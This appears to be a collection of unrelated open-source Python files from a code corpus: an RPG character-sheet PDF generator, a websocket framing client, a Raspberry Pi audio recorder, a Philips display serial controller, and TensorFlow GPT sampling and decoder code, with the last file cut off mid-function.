wrap(f"{pointer} {note}", 40, subsequent_indent=" ")
for (note, pointer) in list(self.footnotes.items())
]
)
)
if len(notes) > 12:
logger.warning("Too many footnotes - truncated.")
for i, note in enumerate(notes[:12]):
self.e[f"note{i}"] = note
def store_footnote(self, note):
"""Returns indicator character"""
return self.footnotes[note] if note else None
class Need2KnowPDF(object):
# Location of form fields in Points (1/72 inch) - 0,0 is bottom-left - and font size
field_xys = {
# Personal Data
"name": (75, 693, 11),
"profession": (343, 693, 11),
"employer": (75, 665, 11),
"nationality": (343, 665, 11),
"age": (185, 640, 11),
"birthday": (200, 640, 11),
"male": (98, 639, 11),
"female": (76, 639, 11),
# Statistical Data
"strength": (136, 604, 11),
"constitution": (136, 586, 11),
"dexterity": (136, 568, 11),
"intelligence": (136, 550, 11),
"power": (136, 532, 11),
"charisma": (136, 514, 11),
"strength_x5": (172, 604, 11),
"constitution_x5": (172, 586, 11),
"dexterity_x5": (172, 568, 11),
"intelligence_x5": (172, 550, 11),
"power_x5": (172, 532, 11),
"charisma_x5": (172, 514, 11),
"strength_distinguishing": (208, 604, 11),
"constitution_distinguishing": (208, 586, 11),
"dexterity_distinguishing": (208, 568, 11),
"intelligence_distinguishing": (208, 550, 11),
"power_distinguishing": (208, 532, 11),
"charisma_distinguishing": (208, 514, 11),
"damage bonus": (555, 200, 11),
"hitpoints": (195, 482, 11),
"willpower": (195, 464, 11),
"sanity": (195, 446, 11),
"breaking point": (195, 428, 11),
"bond0": (512, 604, 11),
"bond1": (512, 586, 11),
"bond2": (512, 568, 11),
"bond3": (512, 550, 11),
# Applicable Skill Sets
"accounting": (200, 361, 11),
"alertness": (200, 343, 11),
"anthropology": (200, 325, 11),
"archeology": (200, 307, 11),
"art1": (200, 289, 11),
"art2": (200, 281, 11),
"artillery": (200, 253, 11),
"athletics": (200, 235, 11),
"bureaucracy": (200, 217, 11),
"computer science": (200, 200, 11),
"craft1label": (90, 185, 9),
"craft1value": (200, 185, 9),
"craft2label": (90, 177, 9),
"craft2value": (200, 177, 9),
"craft3label": (90, 169, 9),
"craft3value": (200, 169, 9),
"craft4label": (90, 161, 9),
"craft4value": (200, 161, 9),
"criminology": (200, 145, 11),
"demolitions": (200, 127, 11),
"disguise": (200, 109, 11),
"dodge": (200, 91, 11),
"drive": (200, 73, 11),
"firearms": (200, 54, 11),
"first aid": (361, 361, 11),
"forensics": (361, 343, 11),
"heavy machinery": (361, 325, 11),
"heavy weapons": (361, 307, 11),
"history": (361, 289, 11),
"humint": (361, 270, 11),
"law": (361, 253, 11),
"medicine": (361, 235, 11),
"melee weapons": (361, 217, 11),
"militaryscience1value": (361, 199, 11),
"militaryscience1label": (327, 199, 11),
"militaryscience2value": (361, 186, 11),
"militaryscience2label": (327, 186, 11),
"navigate": (361, 163, 11),
"occult": (361, 145, 11),
"persuade": (361, 127, 11),
"pharmacy": (361, 109, 11),
"pilot1value": (361, 91, 9),
"pilot1label": (290, 91, 9),
"pilot2value": (361, 83, 9),
"pilot2label": (290, 83, 9),
"psychotherapy": (361, 54, 11),
"ride": (521, 361, 11),
"science1label": (442, 347, 9),
"science1value": (521, 347, 9),
"science2label": (442, 340, 9),
"science2value": (521, 340, 9),
"science3label": (442, 333, 9),
"science3value": (521, 333, 9),
"science4label": (442, 326, 9),
"science4value": (521, 326, 9),
"search": (521, 307, 11),
"sigint": (521, 289, 11),
"stealth": (521, 270, 11),
"surgery": (521, 253, 11),
"survival": (521, 235, 11),
"swim": (521, 217, 11),
"unarmed combat": (521, 200, 11),
"unnatural": (521, 181, 11),
"language1": (521, 145, 11),
"language2": (521, 127, 11),
"language3": (521, 109, 11),
"skill1": (521, 91, 11),
"skill2": (521, 73, 11),
"skill3": (521, 54, 11),
# 2nd page
"weapon0": (85, 480, 11),
"weapon0_roll": (175, 480, 11),
"weapon0_range": (215, 480, 11),
"weapon0_damage": (270, 480, 11),
"weapon0_ap": (345, 480, 11),
"weapon0_lethality": (410, 480, 11),
"weapon0_kill_radius": (462, 480, 11),
"weapon0_ammo": (525, 480, 11),
"weapon0_note": (560, 480, 11),
"weapon1": (85, 461, 11),
"weapon1_roll": (175, 461, 11),
"weapon1_range": (215, 461, 11),
"weapon1_damage": (270, 461, 11),
"weapon1_ap": (345, 461, 11),
"weapon1_lethality": (410, 461, 11),
"weapon1_kill_radius": (462, 461, 11),
"weapon1_ammo": (525, 461, 11),
"weapon1_note": (560, 461, 11),
"weapon2": (85, 442, 11),
"weapon2_roll": (175, 442, 11),
"weapon2_range": (215, 442, 11),
"weapon2_damage": (270, 442, 11),
"weapon2_ap": (345, 442, 11),
"weapon2_lethality": (410, 442, 11),
"weapon2_kill_radius": (462, 442, 11),
"weapon2_ammo": (525, 442, 11),
"weapon2_note": (560, 442, 11),
"weapon3": (85, 423, 11),
"weapon3_roll": (175, 423, 11),
"weapon3_range": (215, 423, 11),
"weapon3_damage": (270, 423, 11),
"weapon3_ap": (345, 423, 11),
"weapon3_lethality": (410, 423, 11),
"weapon3_kill_radius": (462, 423, 11),
"weapon3_ammo": (525, 423, 11),
"weapon3_note": (560, 423, 11),
"weapon4": (85, 404, 11),
"weapon4_roll": (175, 404, 11),
"weapon4_range": (215, 404, 11),
"weapon4_damage": (270, 404, 11),
"weapon4_ap": (345, 404, 11),
"weapon4_lethality": (410, 404, 11),
"weapon4_kill_radius": (462, 404, 11),
"weapon4_ammo": (525, 404, 11),
"weapon4_note": (560, 404, 11),
"weapon5": (85, 385, 11),
"weapon5_roll": (175, 385, 11),
"weapon5_range": (215, 385, 11),
"weapon5_damage": (270, 385, 11),
"weapon5_ap": (345, 385, 11),
"weapon5_lethality": (410, 385, 11),
"weapon5_kill_radius": (462, 385, 11),
"weapon5_ammo": (525, 385, 11),
"weapon5_note": (560, 385, 11),
"weapon6": (85, 366, 11),
"weapon6_roll": (175, 366, 11),
"weapon6_range": (215, 366, 11),
"weapon6_damage": (270, 366, 11),
"weapon6_ap": (345, 366, 11),
"weapon6_lethality": (410, 366, 11),
"weapon6_kill_radius": (465, 366, 11),
"weapon6_ammo": (525, 366, 11),
"weapon6_note": (560, 366, 11),
"gear0": (75, 628, 8),
"gear1": (75, 618, 8),
"gear2": (75, 608, 8),
"gear3": (75, 598, 8),
"gear4": (75, 588, 8),
"gear5": (75, 578, 8),
"gear6": (75, 568, 8),
"gear7": (75, 558, 8),
"gear8": (75, 548, 8),
"gear9": (75, 538, 8),
"gear10": (75, 528, 8),
"gear11": (323, 628, 8),
"gear12": (323, 618, 8),
"gear13": (323, 608, 8),
"gear14": (323, 598, 8),
"gear15": (323, 588, 8),
"gear16": (323, 578, 8),
"gear17": (323, 568, 8),
"gear18": (323, 558, 8),
"gear19": (323, 548, 8),
"gear20": (323, 538, 8),
"gear21": (323, 528, 8),
"note0": (50, 40, 8),
"note1": (50, 30, 8),
"note2": (50, 20, 8),
"note3": (50, 10, 8),
"note4": (240, 40, 8),
"note5": (240, 30, 8),
"note6": (240, 20, 8),
"note7": (240, 10, 8),
"note8": (410, 40, 8),
"note9": (410, 30, 8),
"note10": (410, 20, 8),
"note11": (410, 10, 8),
}
# Fields that also get a multiplier
x5_stats = ["strength", "constitution", "dexterity", "intelligence", "power", "charisma"]
def __init__(self, filename, professions, pages_per_sheet=1):
self.filename = filename
self.pages_per_sheet = pages_per_sheet
self.c = canvas.Canvas(self.filename)
# Set US Letter in points
self.c.setPageSize((612, 792))
self.c.setAuthor("https://github.com/jimstorch/DGGen")
self.c.setTitle("Delta Green Agent Roster")
self.c.setSubject("Pre-generated characters for the Delta Green RPG")
# Register Custom Fonts
pdfmetrics.registerFont(TTFont("Special Elite", "data/SpecialElite.ttf"))
pdfmetrics.registerFont(TTFont("OCRA", "data/OCRA.ttf"))
if len(professions) > 1:
self.generate_toc(professions, pages_per_sheet)
def generate_toc(self, professions, pages_per_sheet):
"""Build a clickable Table of Contents on page 1"""
self.bookmark("Table of Contents")
self.c.setFillColorRGB(0, 0, 0)
self.c.setFont("OCRA", 10)
now = datetime.datetime.utcnow().isoformat() + "Z"
self.c.drawString(150, 712, "DGGEN DTG " + now)
self.c.drawString(150, 700, "CLASSIFIED/DG/NTK//")
self.c.drawString(150, 688, "SUBJ ROSTER/ACTIVE/NOCELL/CONUS//")
top = 650
pagenum = 2
for count, profession in enumerate(professions):
label = generate_label(profession)
chapter = "{:.<40}".format(shorten(label, 37, placeholder="")) + "{:.>4}".format(
pagenum
)
self.c.drawString(150, top - self.line_drop(count), chapter)
self.c.linkAbsolute(
label,
label,
(145, (top - 6) - self.line_drop(count), 470, (top + 18) - self.line_drop(count)),
)
pagenum += profession["number_to_generate"] * pages_per_sheet
if pages_per_sheet == 1:
chapter = "{:.<40}".format("Blank Character Sheet Second Page") + "{:.>4}".format(
pagenum + profession["number_to_generate"]
)
self.c.drawString(150, top - self.line_drop(pagenum), chapter)
self.c.linkAbsolute(
"Back Page",
"Back Page",
(
145,
(top - 6) - self.line_drop(pagenum),
470,
(top + 18) - self.line_drop(pagenum),
),
)
self.c.showPage()
@staticmethod
def line_drop(count, linesize=22):
return count * linesize
def bookmark(self, text):
self.c.bookmarkPage(text)
self.c.addOutlineEntry(text, text)
def draw_string(self, x, y, size, text):
self.c.setFont(DEFAULT_FONT, size)
self.c.setFillColorRGB(*TEXT_COLOR)
self.c.drawString(x, y, str(text))
def fill_field(self, field, value):
try:
x, y, s = self.field_xys[field]
self.draw_string(x, y, s, str(value))
except KeyError:
logger.error("Unknown field %s", field)
def add_page(self, d):
# Add background. ReportLab will cache it for repeat
self.c.drawImage("data/Character Sheet NO BACKGROUND FRONT.jpg", 0, 0, 612, 792)
for key in d:
self.fill_field(key, d[key])
# Tell ReportLab we're done with current page
self.c.showPage()
def add_page_2(self, e):
# Add background. ReportLab will cache it for repeat
self.c.drawImage("data/Character Sheet NO BACKGROUND BACK.jpg", 0, 0, 612, 792)
for key in e:
self.fill_field(key, e[key])
# Tell ReportLab we're done with current page
self.c.showPage()
def save_pdf(self):
if self.pages_per_sheet == 1:
self.bookmark("Back Page")
self.c.drawImage("data/Character Sheet NO BACKGROUND BACK.jpg", 0, 0, 612, 792)
self.c.showPage()
self.c.save()
def generate_label(profession):
return ", ".join(
e
for e in [
profession.get("label", ""),
profession.get("employer", ""),
profession.get("division", ""),
]
if e
)
def get_options():
"""Get options and arguments from argv string."""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-v",
"--verbosity",
action="count",
default=0,
help="specify up to three times to increase verbosity, "
"i.e. -v to see warnings, -vv for information messages, or -vvv for debug messages.",
)
parser.add_argument("-V", "--version", action="version", version=__version__)
parser.add_argument(
"-o",
"--output",
action="store",
default=f"DeltaGreenPregen-{datetime.datetime.now() :%Y-%m-%d-%H-%M}.pdf",
help="Output PDF file. Defaults to %(default)s.",
)
parser.add_argument(
"-t", "--type", action="store", help=f"Select single profession to generate."
)
parser.add_argument("-l", "--label", action="store", help="Override profession label.")
parser.add_argument(
"-c",
"--count",
type=int,
action="store",
help="Generate this many characters of each profession.",
)
parser.add_argument(
"-e", "--employer", action="store", help="Set employer for all generated characters."
)
parser.add_argument(
"-u",
"--unequipped",
action="store_false",
dest="equip",
help="Don't generate equipment.",
default=True,
)
data = parser.add_argument_group(title="Data", description="Data file locations")
data.add_argument(
"--professions",
action="store",
default="data/professions.json",
help="Data file for professions - defaults to %(default)s",
)
return parser.parse_args()
@dataclass
class Data:
male_given_names: List[str]
female_given_names: List[str]
family_names: List[str]
towns: List[str]
professions: Dict[str, Any]
kits: Dict[str, Any]
weapons: Dict[str, Any]
armour: Dict[str, Any]
distinguishing: Dict[Tuple[str, int], List[str]]
def load_data(options):
with open("data/boys1986.txt") as f:
male_given_names = f.read().splitlines()
with open("data/girls1986.txt") as f:
female_given_names = f.read().splitlines()
with open("data/surnames.txt") as f:
family_names = f.read().splitlines()
with open("data/towns.txt") as f:
towns = f.read().splitlines()
with open(options.professions) as f:
professions = json.load(f)
with open("data/equipment.json") as f:
equipment = json.load(f)
kits = equipment["kits"]
weapons = equipment["weapons"]
armour = equipment["armour"]
distinguishing = {}
with open("data/distinguishing-features.csv") as f:
for row in csv.DictReader(f):
for value in range(int(row["from"]), int(row["to"]) + 1):
distinguishing.setdefault((row["statistic"], value), []).append(
row["distinguishing"]
)
data = Data(
male_given_names=male_given_names,
female_given_names=female_given_names,
family_names=family_names,
towns=towns,
professions=professions,
kits=kits,
weapons=weapons,
armour=armour,
distinguishing=distinguishing,
)
return data
def init_logger(verbosity, stream=sys.stdout):
"""Initialize logger and warnings according to verbosity argument.
Verbosity levels of 0-3 supported."""
is_not_debug = verbosity <= 2
level = (
[logging.ERROR, logging.WARNING, logging.INFO][verbosity] if is_not_debug else logging.DEBUG
)
log_format = (
"%(message)s"
if is_not_debug
else "%(asctime)s %(levelname)-8s %(name)s %(module)s.py:%(funcName)s():%(lineno)d %(message)s"
)
logging.basicConfig(level=level, format=log_format, stream=stream)
if is_not_debug:
warnings.filterwarnings("ignore")
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "jimstorch/netboa",
"score": 2
} |
#### File: netboa/websocket/ws_client.py
```python
import struct
import array
from netboa import verbosity
from netboa import str_to_bytes
from netboa import bytes_to_str
from netboa.client import Client
from netboa.websocket.ws_error import NetboaWsBadFrame
from netboa.websocket.ws_error import NetboaWsCloseFrame
def unpack_frame(data):
size = len(data)
if size < 1:
raise NetboaWsBadFrame('[WS13] empty frame.')
#if l <
byte1, byte2 = struct.unpack_from('!BB', data)
if not (byte1 >> 7) & 1:
raise NetboaWsBadFrame('[WS13] final bit not set.')
opcode = byte1 & 0xf
## Firefox sends a close-frame opcode when you close the page
if opcode & 0x8:
raise NetboaWsCloseFrame('[WS13] close-frame opcode received.')
if not opcode & 0x1:
raise NetboaWsBadFrame('[WS13] not text frame.')
masked = (byte2 >> 7) & 1
mask_offset = 4 if masked else 0
payload_hint = byte2 & 0x7f
if payload_hint < 126:
payload_offset = 2
payload_length = payload_hint
elif payload_hint == 126:
payload_offset = 4
if size < 4:
raise NetboaWsBadFrame('[WS13] too short for 16b payload length.')
payload_length = struct.unpack_from('!H',data,2)[0]
elif payload_hint == 127:
payload_offset = 8
if size < 8:
raise NetboaWsBadFrame('[WS13] too short for 64b payload length.')
payload_length = struct.unpack_from('!Q',data,2)[0]
payload = array.array('B')
payload.fromstring(data[payload_offset + mask_offset:])
if len(payload) != payload_length:
raise NetboaWsBadFrame('[WS13] malformed payload length.')
if masked:
if size < (payload_offset + 4):
raise NetboaWsBadFrame('[WS13] frame too short for mask.')
mask_bytes = struct.unpack_from('!BBBB',data,payload_offset)
for i in range(len(payload)):
payload[i] ^= mask_bytes[i % 4]
return payload.tostring()
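# Example of the masked text frame a client might send for the payload 'Hi'
# (mask bytes chosen arbitrarily for illustration):
#   b'\x81\x82\x01\x02\x03\x04\x49\x6b'
#   0x81 = FIN + text opcode, 0x82 = masked + length 2, mask = 01 02 03 04,
#   masked payload = 'H'^0x01, 'i'^0x02  ->  unpack_frame(...) returns 'Hi'.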
def pack_frame(payload):
header = b'\x81' # Final Frame Flag & Text Frame Op Code
size = len(payload)
if size < 126:
header += struct.pack('!B', size)
elif size < 2**16:
header += struct.pack('!BH', 126, size)
elif size < 2**64:
header += struct.pack('!BQ', 127, size)
else:
        raise ValueError('[WS13] payload too large to frame (>= 2**64 bytes).')
return header + payload
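# Example: pack_frame('Hi') -> '\x81\x02Hi' (FIN + text opcode, unmasked, length 2);
# payloads of 126..65535 bytes get a 2-byte extended length, larger ones an 8-byte one.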
class WsClient(Client):
def __init__(self, sock, address, port):
Client.__init__(self, sock, address, port)
def get_string(self):
data = bytes_to_str(self.get_bytes())
try:
payload = unpack_frame(data)
except NetboaWsCloseFrame as error:
payload = ''
self.server.vprint('[WebSocket] %s' % error, verbosity.INFO)
self.deactivate()
except NetboaWsBadFrame as error:
payload = ''
self.server.vprint('[WebSocket Error] %s' % error, verbosity.ERROR)
self.deactivate()
return payload
def send(self, data):
frame = pack_frame(data)
self.send_raw(frame)
def send_raw(self, data):
if type(data) == str:
self.send_buffer += str_to_bytes(data)
else:
self.send_buffer += data
self.server._request_send(self)
``` |
{
"source": "jimstorch/pi_conference_recorder",
"score": 3
} |
#### File: jimstorch/pi_conference_recorder/record_pi.py
```python
import os
import sys
import time
from datetime import datetime
import alsaaudio
import solame as lame
from gpiozero import LED
from gpiozero import Button
USAGE = """
Usage: record.py [OPTION]...
-d, --device Specify the capture device.
-h, --help Print this message and exit.
-l, --list List capture devices and exit.
-p, --path Set the path to save MP3's to.
-r, --rate Specify the capture devices rate; 44100, 48000, etc.
"""
MAX_RECORD_TIME = 60 * 60 * 3 # Three hours worth of seconds
# Button Blink Status Codes
GOOD = 1
FILE_PATH_ERROR = 2
DEVICE_OPEN_ERROR = 3
STREAM_OPEN_ERROR = 4
FILE_WRITE_ERROR = 5
BUFFER_OVERFLOW = 6
# Set up our GPIO
LED_GPIO = 18
BUTTON_GPIO = 24
led = LED(LED_GPIO)
led.off()
# Global for state control, True = recording
_RECORDING_STATE = False
def toggle_recording_state():
"""
Callback function for gpiozero lib's Button.when_pressed property.
Used to toggle whether we're in recording mode or not and to set the button LED state
"""
global _RECORDING_STATE
_RECORDING_STATE = not _RECORDING_STATE
#led.value = _RECORDING_STATE
print('recording_state', _RECORDING_STATE)
if _RECORDING_STATE:
led.blink(1,.5)
else:
led.off()
def led_blink(blinks):
"""
Blink the record button light a series of times to indicate a status.
"""
for _ in range(blinks):
led.on()
time.sleep(.5)
led.off()
time.sleep(.5)
def datestamp():
"""
Give us a unique, sortable date-based file prefix in the format of '2019-12-31_2359.1234' .
"""
return(datetime.now().strftime("%Y-%m-%d_%H%M.%S"))
"""
List audio devices and exit.
"""
for index, arg in enumerate(sys.argv):
if arg in ['--list', '-l']:
devices = alsaaudio.pcms(alsaaudio.PCM_CAPTURE)
print("Listing audio capture hardware:")
for device in devices:
print('\t', device)
exit()
for index, arg in enumerate(sys.argv):
if arg in ['--help', '-h']:
print(USAGE)
exit()
# 'default' is OK for onboard audio, but for USB audio devices you'll probably need to specify one.
ALSA_DEVICE = 'default'
# TASCAM US 4x4 = plughw:CARD=US4x4,DEV=0
# Blue Yeti = plughw:CARD=Microphone,DEV=0
for index, arg in enumerate(sys.argv):
if arg in ['--device', '-d'] and len(sys.argv) > index + 1:
ALSA_DEVICE = sys.argv[index + 1]
del sys.argv[index]
del sys.argv[index]
break
RATE = 44100 # Match the hardware rate or there will be trouble. Blue Yeti = 48000
for index, arg in enumerate(sys.argv):
if arg in ['--rate', '-r'] and len(sys.argv) > index + 1:
RATE = int(sys.argv[index + 1])
del sys.argv[index]
del sys.argv[index]
break
RECORDING_PATH = "."
for index, arg in enumerate(sys.argv):
if arg in ['--path', '-p'] and len(sys.argv) > index + 1:
RECORDING_PATH = sys.argv[index + 1]
del sys.argv[index]
del sys.argv[index]
break
if len(sys.argv) != 1:
print(USAGE)
exit()
if __name__ == "__main__":
if not os.path.isdir(RECORDING_PATH):
print('Recording path "%s" not accessible.' % RECORDING_PATH)
led_blink(FILE_PATH_ERROR)
quit()
# Set the button callback
button = Button(BUTTON_GPIO)
button.when_pressed = toggle_recording_state
# If we got this far, let's give an visual thumb's up
led_blink(GOOD)
# Configure Lame Encoder
# It will stay open for the duration of the program
lame.set_sample_rate(RATE)
lame.set_num_channels(1)
lame.set_mode(lame.MONO)
lame.set_bit_rate(32)
lame.init_parameters()
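    # At 32 kbit/s mono this is roughly 4 kB of MP3 per second, i.e. about 14.4 MB
    # per hour, so a recording capped at MAX_RECORD_TIME (3 h) stays near 43 MB.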
while True:
if _RECORDING_STATE:
# Create pyAlsaAudio stream, settings
capture = alsaaudio.PCM(
alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NONBLOCK, device=ALSA_DEVICE)
capture.setchannels(1)
capture.setrate(RATE)
capture.setformat(alsaaudio.PCM_FORMAT_S16_LE)
capture.setperiodsize(160)
# Open a file descriptor for writing
mp3filename = os.path.join(RECORDING_PATH, '%s.mp3' % datestamp())
mp3file = open(mp3filename, 'wb')
start_time = time.time()
print('--> Recording %s started.' % mp3filename)
while _RECORDING_STATE:
# Grab some PCM data from the input device
l, pcm = capture.read()
if l:
mp3_data = lame.encode_buffer(pcm)
mp3file.write(mp3_data)
# Have we been going too long?
if time.time() - start_time >= MAX_RECORD_TIME:
toggle_recording_state()
# Finish the MP3 encoding
capture.close()
mp3_data = lame.encode_flush()
if len(mp3_data):
mp3file.write(mp3_data)
mp3file.close()
print('--> %s finished.' % mp3filename)
``` |
{
"source": "jimstorch/pySICP",
"score": 3
} |
#### File: jimstorch/pySICP/on.py
```python
import serial
"""
Control Philips Digital Signage via the serial port.
Requires pyserial:
pip3 install pyserial
This is an older device that uses SICP v1.7 (no Group byte)
Note that you may need to add yourself to the 'dialout' group in Linux.
"""
DEVICE = '/dev/ttyUSB0'
MONITOR = 0x01
SET_POWER_STATE = 0x18
PWR_OFF = 0x01
PWR_ON = 0x02
with serial.Serial() as ser:
ser.baudrate = 9600
ser.port = DEVICE
ser.open()
ser.timeout = .25
#print(ser)
def checksum(data):
# Calculate checksum by Exclusive Or'ing each byte
c = data[0]
for b in data[1:]:
c ^= b
return c
def checksum_write(data):
packet = bytearray()
# First byte is the packet length
# to which we add one byte for leading length byte itself
# and another for the trailing checksum byte
packet.append(len(data) + 2)
packet.extend(data)
packet.append(checksum(packet))
print('Sending packet ', packet)
ser.write(packet)
cmd = [MONITOR, SET_POWER_STATE, PWR_ON]
checksum_write(cmd)
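    # Worked example (a sketch, assuming the SICP v1.7 framing above): for PWR_ON
    # the data bytes are [0x01, 0x18, 0x02], the length byte is len(data) + 2 = 0x05,
    # and the checksum is 0x05 ^ 0x01 ^ 0x18 ^ 0x02 = 0x1E, so the packet on the
    # wire should be 05 01 18 02 1E.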
resp = ser.read(40)
#print(resp)
if resp == b'\x05\x01\x00\x06\x02':
print('CMD OK')
else:
print('Bad response ', resp)
``` |
{
"source": "jimsxchen/genlogger",
"score": 3
} |
#### File: genlogger/test/test.py
```python
import logging
from jlogger import j_logger
import unittest
class TestRotatingFileLog(unittest.TestCase):
def setUp(self):
j_logger.set_logger("rotate_logger_unittest.log", max_size=2048)
self.logger=logging.getLogger(__name__)
def test_wrap(self):
assert self.logger.hasHandlers()
for i in range(200):
self.logger.info(f"Testing wrap and rotate. {i} ")
def test_formatter_change(self):
self.logger.info(f"Test test_formatter_change starts.")
fmtter = self.logger.root.handlers[0].formatter
new_fmtter = logging.Formatter("%(asctime)s — myname — %(funcName)s:%(lineno)d — %(levelname)s — %(message)s")
self.logger.root.handlers[0].setFormatter(new_fmtter)
self.logger.info(f"after changing formatter.")
self.logger.root.handlers[0].setFormatter(fmtter)
self.logger.info(f"restore formatter.")
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jimth001/formality_emnlp19",
"score": 4
} |
#### File: evaluate/tokenizer/tokenizer.py
```python
import nltk
def file_tokenize(input,output):
with open(input,'r',encoding='utf-8') as f:
with open(output,'w',encoding='utf-8') as fw:
for line in f:
fw.write(' '.join(nltk.word_tokenize(line.strip()))+'\n')
```
#### File: gpt/src/sample.py
```python
import tensorflow as tf
from gpt.src import model
def top_k_logits(logits, k):
if k == 0:
# no truncation
return logits
def _top_k():
values, _ = tf.nn.top_k(logits, k=k)
min_values = values[:, -1, tf.newaxis]
return tf.where(
logits < min_values,
tf.ones_like(logits, dtype=logits.dtype) * -1e10,
logits,
)
return tf.cond(
tf.equal(k, 0),
lambda: logits,
lambda: _top_k(),
)
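# Note (informal): with k=0 the logits pass through unchanged (no truncation),
# with k=1 sampling reduces to greedy decoding, and otherwise everything outside
# the top-k logits is pushed down to -1e10 so it is effectively never sampled.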
def sample_sequence(*, hparams, length, start_token=None, batch_size=None, context=None, temperature=1, top_k=0):
if start_token is None:
assert context is not None, 'Specify exactly one of start_token and context!'
else:
assert context is None, 'Specify exactly one of start_token and context!'
context = tf.fill([batch_size, 1], start_token)
def step(hparams, tokens, past=None):
lm_output = model.model(hparams=hparams, X=tokens, past=past, reuse=tf.AUTO_REUSE)
logits = lm_output['logits'][:, :, :hparams.n_vocab]
presents = lm_output['present']
presents.set_shape(model.past_shape(hparams=hparams, batch_size=batch_size))
return {
'logits': logits,
'presents': presents,
}
with tf.name_scope('sample_sequence'):
# Don't feed the last context token -- leave that to the loop below
# TODO: Would be slightly faster if we called step on the entire context,
# rather than leaving the last token transformer calculation to the while loop.
context_output = step(hparams, context[:, :-1])
def body(past, prev, output, all_logits):
next_outputs = step(hparams, prev[:, tf.newaxis], past=past)
logits = next_outputs['logits'][:, -1, :] / tf.to_float(temperature)
logits = top_k_logits(logits, k=top_k)
samples = tf.multinomial(logits, num_samples=1, output_dtype=tf.int32)
return [
tf.concat([past, next_outputs['presents']], axis=-2),
tf.squeeze(samples, axis=[1]),
tf.concat([output, samples], axis=1),
tf.concat([all_logits,next_outputs['logits']],axis=1)
]
def cond(*args):
return True
_, _, tokens,all_logits = tf.while_loop(
cond=cond, body=body,
maximum_iterations=length,
loop_vars=[
context_output['presents'],
context[:, -1],
context,
context_output['logits']
],
shape_invariants=[
tf.TensorShape(model.past_shape(hparams=hparams, batch_size=batch_size)),
tf.TensorShape([batch_size]),
tf.TensorShape([batch_size, None]),
tf.TensorShape([batch_size, None, None]),
],
back_prop=False,
)
return tokens
``` |
{
"source": "jimth001/my-tf-framework-for-nlp-tasks",
"score": 2
} |
#### File: my-tf-framework-for-nlp-tasks/DeepComponents/GPTDecoder.py
```python
import tensorflow as tf
from DeepComponents.TransformerBlock import block, positions_for,norm, shape_list
from DeepComponents.common_ops import gather_2d, tile_to_beam_size, merge_first_two_dims
class Decoder():
def __init__(self,scope,hparams):
self.scope = scope
self.hparams = hparams
with tf.variable_scope(scope):
with tf.variable_scope('model', reuse=tf.AUTO_REUSE):
self.wpe=tf.get_variable('wpe', [self.hparams.n_ctx, self.hparams.n_embd],
initializer=tf.random_normal_initializer(stddev=0.01))
self.wte = tf.get_variable('wte', [self.hparams.n_vocab, self.hparams.n_embd],
initializer=tf.random_normal_initializer(stddev=0.02))
self.attn_w = tf.get_variable(shape=(self.hparams.n_embd, self.hparams.n_embd), name='sen_attn_w')
def decode_all(self,tokens,past_list,enc_h_list):
"""for multiple sources, like GPT-HA, if len(past_list)==1, it is a simple GPTEncoder-Decoder model"""
with tf.variable_scope(self.scope,reuse=tf.AUTO_REUSE):
with tf.variable_scope('model',reuse=tf.AUTO_REUSE):
results = {}
if type(past_list)!=list:
past_list=[past_list]
batch, sequence = shape_list(tokens)
#past_length = 0
all_past_length=[0 if past_list[0] is None else tf.shape(past_list[0])[-2]]
past_length = tf.reduce_max(tf.stack(all_past_length,axis=0),axis=0)
h = tf.gather(self.wte, tokens) + tf.gather(self.wpe, positions_for(tokens, past_length))
values_present = {}
for i in range(0, self.hparams.n_layer):
querys = h
values_h = []
for j in range(0, len(past_list)):
past = past_list[j]
pasts = tf.unstack(past, axis=1) if past is not None else [None] * self.hparams.n_layer
assert len(pasts) == self.hparams.n_layer
h, present = block(querys, 'h%d' % i, past=pasts[i], hparams=self.hparams)
values_h.append(h)
if j in values_present:
values_present[j].append(present)
else:
values_present[j]=[present]
enc_h_all = tf.concat(enc_h_list, axis=1)
attn_score = tf.tensordot(querys, self.attn_w, axes=(2, 0))
attn_score = tf.matmul(attn_score, tf.transpose(enc_h_all, perm=(0, 2, 1))) # batch*seq*context_num
attn_score = tf.nn.softmax(attn_score,axis=2)
val_h_cat = tf.stack(values_h, axis=2)
val_h_cat = tf.expand_dims(attn_score, axis=3) * val_h_cat
val_h_cat = tf.reduce_sum(val_h_cat, axis=2)
h = val_h_cat
for j in range(0,len(past_list)):
values_present[j]=tf.stack(values_present[j],axis=1)
past_list[j]=tf.concat([past_list[j],values_present[j]],axis=-2)
h = norm(h, 'ln_f')
# Language model loss. Do tokens <n predict token n?
h_flat = tf.reshape(h, [batch * sequence, self.hparams.n_embd])
logits = tf.matmul(h_flat, self.wte, transpose_b=True)
logits = tf.reshape(logits, [batch, sequence, self.hparams.n_vocab])
results['logits'] = logits
return results
def sef_var_for_beam_search(self,enc_0_len,enc_h_list,beam_size):
self.enc_0_len=enc_0_len
self.enc_h_list=enc_h_list
self.enc_h_all = tf.concat(self.enc_h_list, axis=1)
self.enc_h_all=merge_first_two_dims(tile_to_beam_size(self.enc_h_all,beam_size=beam_size))
def decode_one_step(self,hparams:"no use, only for consistency of api", input_token, past_dec:list):
with tf.variable_scope(self.scope, reuse=tf.AUTO_REUSE):
with tf.variable_scope('model', reuse=tf.AUTO_REUSE):
all_past_length = [0 if past_dec[j] is None else tf.shape(past_dec[j])[-2] for j in range(0,len(past_dec))]
past_length=tf.reduce_max(tf.stack(all_past_length,axis=0),axis=0)
h = tf.gather(self.wte, input_token) + tf.gather(self.wpe, positions_for(input_token, past_length))
results = {}
batch, sequence = shape_list(input_token)
values_present = {}
for i in range(0, self.hparams.n_layer):
querys = h
values_h = []
for j in range(0, len(past_dec)):
dec_pasts = tf.unstack(past_dec[j], axis=1) if past_dec[j] is not None else [None] * self.hparams.n_layer #
h, present = block(querys, 'h%d' % i,
past=dec_pasts[i],
hparams=self.hparams)
values_h.append(h)
if j in values_present:
values_present[j].append(present)
else:
values_present[j]=[present]
attn_score = tf.tensordot(querys, self.attn_w, axes=(2, 0))
attn_score = tf.matmul(attn_score, tf.transpose(self.enc_h_all, perm=(0, 2, 1))) # batch*seq*context_num
attn_score = tf.nn.softmax(attn_score, axis=2)
val_h_cat = tf.stack(values_h, axis=2)
val_h_cat = tf.expand_dims(attn_score, axis=3) * val_h_cat
val_h_cat = tf.reduce_sum(val_h_cat, axis=2)
h = val_h_cat
for j in range(0,len(past_dec)):
